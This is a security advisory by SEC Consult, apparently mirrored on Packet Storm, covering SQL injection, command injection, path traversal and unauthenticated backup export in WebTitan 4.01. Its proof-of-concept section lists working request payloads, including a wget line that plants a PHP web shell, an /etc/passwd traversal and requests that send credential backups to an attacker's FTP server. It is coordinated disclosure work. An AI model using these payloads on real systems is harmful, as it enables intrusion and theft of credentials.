what you don't know can hurt you

WebTitan 4.01 Build 68 SQL Injection / Command Execution

WebTitan 4.01 Build 68 SQL Injection / Command Execution
Posted Jun 6, 2014
Authored by Robert Giruckas, Mindaugas Liudavicius | Site sec-consult.com

WebTitan version 4.01 build 68 suffers from remote command execution, remote SQL injection, unprotected access, and directory traversal vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
MD5 | 5d47a86ca68a3e2ff20dd95474ce3788

WebTitan 4.01 Build 68 SQL Injection / Command Execution

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SEC Consult Vulnerability Lab Security Advisory < 20140606-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: WebTitan
vulnerable version: 4.01 (Build 68)
fixed version: 4.04
impact: critical
homepage: http://www.webtitan.com
found: 2014-04-07
by: Robert Giruckas, Mindaugas Liudavicius
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor description:
- -------------------
"WebTitan offers ultimate protection from internet based threats and powerful
web filtering functionalities to SMBs, Service Providers and Education sectors
around the World."

Source: http://www.webtitan.com/about-us/webtitan


Business recommendation:
- ------------------------
Multiple critical security vulnerabilities have been identified in the WebTitan
system. Exploiting these vulnerabilities potential attackers could take control
over the entire system.

It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.


Vulnerability overview/description:
- -----------------------------------
1) SQL Injection
A SQL injection vulnerability in the /categories-x.php script allows
unauthenticated remote attackers to execute arbitrary SQL commands via the
"sortkey" parameter.

2) Remote command execution
Multiple remote command execution vulnerabilities were detected in the
WebTitan GUI. This security flaw exists due to lack of input validation. An
authenticated attacker of any role (Administrator, Policy Manager, Report
Manager) can execute arbitrary OS commands with the privileges of the web
server.

3) Path traversal
The web GUI fails to properly filter user input passed to the logfile
parameter. This leads to arbitrary file download by unauthenticated attackers.

4) Unprotected Access
The web GUI does not require authentication for certain PHP scripts. This
security issue allows an unauthenticated remote attacker to download Webtitan
configuration backup (including hashed user credentials) to the attacker's FTP
server.


Proof of concept:
- -----------------
1) SQL Injection
The manipulation of the "sortkey" parameter allows users to modify the
original SQL query.

GET /categories-x.php HTTP/1.1
/categories-x.php?getcategories&sortkey=name) limit 1;--
/categories-x.php?getcategories&sortkey=name) limit 5;--

2) Remote command execution
Due to improper user input validation it is possible to inject arbitrary OS
commands using backticks ``. Some of the affected files do not sanitize any
type of shell metacharacters, this allows an attacker to use more flexible OS
commands. Tested and working payload for most scripts: `/usr/local/bin/wget
http://<URL to shell script> -O /usr/blocker/www/graph/CPU/xshell.php`

Affected scripts: logs-x.php, users-x.php, support-x.php, time-x.php,
scheduledreports-x.php, reporting-x.php, network-x.php

a. logs-x.php, vulnerable parameters: fname, logfile
/logs-x.php?jaction=view&fname=webtitan.log;ls -la
/logs-x.php POST Content: jaction=delete&logfile=<PAYLOAD>

b. users-x.php, vulnerable parameters: ldapserver
/users-x.php?findLdapDC=1&ldapserver=<PAYLOAD>

c. support-x.php, vulnerable parameters: tracehost, dighost, pinghost
/support-x.php POST Content: jaction=ping&pinghost=<PAYLOAD>
/support-x.php POST Content: jaction=ping&dighost=<PAYLOAD>
/support-x.php POST Content: jaction=ping&tracehost=<PAYLOAD>

d. time-x.php, vulnerable parameters: ntpserversList
/time-x.php POST Content:
jaction=ntpSync&timezone=Europe%2FLondon&ntp=1&ntpservers_entry=&date_month=4&date_day=8&date_year=2014&h_time=9&m_time=57&ntpserversList=<PAYLOAD>

e. scheduledreports-x.php, vulnerable parameters: reportid
/scheduledreports-x.php?runReport=1&reportid=<PAYLOAD>

f. reporting-x.php, vulnerable parameter: delegated_admin
/reporting-x.php POST Content:
jaction=exportpdf&report=r_requests_user&period=period_today&uid=0&sourceip=0&urlid=0&groupid=0&categoryid=0&domain=&chart=pie&reporthtml=&reportid=1396860686&rowsperpage=10&currentpage=1&startdate=1396843200&enddate=1396929599&reportfilter=f_0&delegated_admin=admin';<PAYLOAD>'&gotopage=1

g. network-x.php, vulnerable parameters: hostname (limited to 15 symbols
length), domain
jaction=saveHostname&hostname=`root`
jaction=saveDNS&domain=domain.com;<PAYLOAD>&dnsservers=192.168.0.1-:-


3) Path traversal
Due to missing input filtering in the logs-x.php script it is possible to
download arbitrary files without any authentication:

Vulnerable parameters: logfile
Post Content: jaction=download&logfile=../../../etc/passwd

4) Unprotected Access
a. Since the script backup-x.php does not require authentication, remote
attackers can initiate a backup of Webtitan configuration files to a remote
FTP server by executing the following requests:

/backup-x.php
POST Content:
jaction=saveFTP&jstatus=&schedule=1&frequency=daily&hour=16&minute=38&day_of_week=Mon&day_of_month=1&ftpserver=<IP>&ftplogin=<login>&ftppassword=<pw>&ftplocation=<path>

Where <IP> is the remote FTP server IP, <login> - remote FTP server
login, <password> - remote FTP, <path> - path where to store backup

With the next request, an attacker can force the backup to be uploaded
to the attacker's FTP server:

/backup-x.php
POST Content: jaction=exportNowtoFtp

b. The autoconf-x.php, contentfiltering-x.php, license-x.php, msgs.php,
reports-drill.php scripts can be reached by an unauthenticated user. The
categories-x.php, urls-x.php can also be accessed by faking the HTTP User-Agent
header, by setting it to "Shockwave Flash".


Vulnerable / tested versions:
- -----------------------------
The vulnerabilities have been verified to exist in the WebTitan VMware
appliance ver. 4.0.1 (build 68). It is assumed that previous versions are
affected too.


Vendor contact timeline:
- ------------------------
2014-04-17: Contacting vendor through info@webtitan.com and helpdesk@webtitan.com
2014-04-23: Vendor is investigating the vulnerabilities
2014-05-09: Vendor is testing security patches
2014-06-03: Vendor releases the version 4.04 of WebTitan
2014-06-06: SEC Consult releases a coordinated security advisory


Solution:
- ---------
Update to the most recent version 4.04 of WebTitan.


Workaround:
- -----------


Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Mindaugas Liudavicius / @2014

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBAgAGBQJTkdkyAAoJECyFJyAEdlkKbkoH/juLPfKaVjoaow4QFP9NT4mr
5DGHiCO3+TFU41I33NKbIKbC+qvAqQIWn0WNhk2I1+z0ZyooRTMn506jBnawMncj
NDTxeFxMLjaybzfemb8D+wBJ+9vzwWCMbUd7M/llIq2L91Zh+0poYuxJBN+GIHMP
PddPkGZPnv8YaWPF2gRahbgy3IY/pEi1LxgrN3xCVE/3A1l5Hb1bgzeqUvI4v22A
mT8jgTB1cft+1KR5BFkS7BfhSos26f5eWHJvzFR3I271wz/7Af9KIMMAcopz5pyW
uvEZeYRYOf+duTX8AFyJr7/YZSXjOEY3x9h59tLLFSJwt6lxmQmuqruEr2m5Nis=
=zQIb
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    32 Files
  • 25
    Nov 25th
    9 Files
  • 26
    Nov 26th
    11 Files
  • 27
    Nov 27th
    15 Files
  • 28
    Nov 28th
    9 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close